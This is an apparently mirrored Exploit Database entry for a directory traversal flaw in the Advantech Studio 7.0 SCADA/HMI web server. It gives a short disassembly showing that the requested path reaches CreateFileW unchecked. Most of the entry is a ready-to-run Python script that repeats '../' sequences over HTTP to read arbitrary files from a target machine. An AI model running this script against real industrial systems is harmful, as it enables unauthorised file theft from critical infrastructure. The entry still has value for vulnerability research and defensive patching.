Advantech Studio 7.0 – SCADA/HMI Directory Traversal

• Exploit Database
• 52 阅读

• 作者： Nin3
  日期： 2012-12-04
• 类别：

  • webapps
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/23132/

• # Exploit Title: Advantech Studio v7.0 SCADA/HMI Directory Traversal 0-day
  # Google Dork: N/A
  # Date: 2012-12-03
  # Exploit Author: Nin3
  # Vendor Homepage: http://advantech.com.tw
  # Version: 7.0 Build Number 0501.1111.0402.0000
  # Tested on: Windows
  # CVE : N/A
  
  '''
  Advantech Studio v7.0 SCADA/HMI has a built in web server NTWebServer.exe,
  the web server is a standalone executable that is used along side every project'
  to serve as a web based management system with the help of an activex.
  
  The flaw occurs because of a lack of any check on the path of the file requested. in
  function sub_401A90:
  
  .text:00402A4A push0 ; dwFlagsAndAttributes
  .text:00402A4C push3 ; dwCreationDisposition
  .text:00402A4E push3 ; dwShareMode
  .text:00402A50 push80000000h ; dwDesiredAccess
  .text:00402A55 mov edx, [ebp+lpFileName]
  .text:00402A58 pushedx ; lpFileName
  .text:00402A59 lea ecx, [ebp+var_1C]
  .text:00402A5C callsub_401A90
  
  
  sub_401A90 use CreateFileW function directly.
  
  .text:00401A97 push0 ; hTemplateFile
  .text:00401A99 mov eax, [ebp+dwFlagsAndAttributes]
  .text:00401A9C pusheax ; dwFlagsAndAttributes
  .text:00401A9D mov ecx, [ebp+dwCreationDisposition]
  .text:00401AA0 pushecx ; dwCreationDisposition
  .text:00401AA1 push0 ; lpSecurityAttributes
  .text:00401AA3 mov edx, [ebp+dwShareMode]
  .text:00401AA6 pushedx ; dwShareMode
  .text:00401AA7 mov eax, [ebp+dwDesiredAccess]
  .text:00401AAA pusheax ; dwDesiredAccess
  .text:00401AAB mov ecx, [ebp+lpFileName]
  .text:00401AAE pushecx ; lpFileName
  .text:00401AAF callds:CreateFileW
  
  '''
  import argparse
  import httplib
  
  MAX_NESTED_DIRECTORY = 32
  
  def main():
  parser = argparse.ArgumentParser()
  parser.add_argument('-d')
  parser.add_argument('-p')
  parser.add_argument('-f')
  args = parser.parse_args()
  if args.d == None or args.p == None or args.f == None:
  print "[!]EXAMPLE USAGE: traverse.py -d 127.0.0.1 -p 80 -f windows/system.ini"
  return
  httpConn = httplib.HTTPConnection(args.d, int(args.p))
  for i in xrange(0, MAX_NESTED_DIRECTORY):
  temp = MakePath(args.f, i)
  httpConn.request('GET', temp)
  resp = httpConn.getresponse()
  content =resp.read()
  if resp.status == 404:
  print 'Not found ' + temp
  else:
  print 'Found ' + temp
  print'------------------------------------------'
  print content
  print'---------------------------------------EOF'
  break
  
  
  
  def MakePath(f, count):
  a = ""
  for i in xrange(0, count):
  a = a + "../"
  return a + f
  
  if __name__ == "__main__":
  main()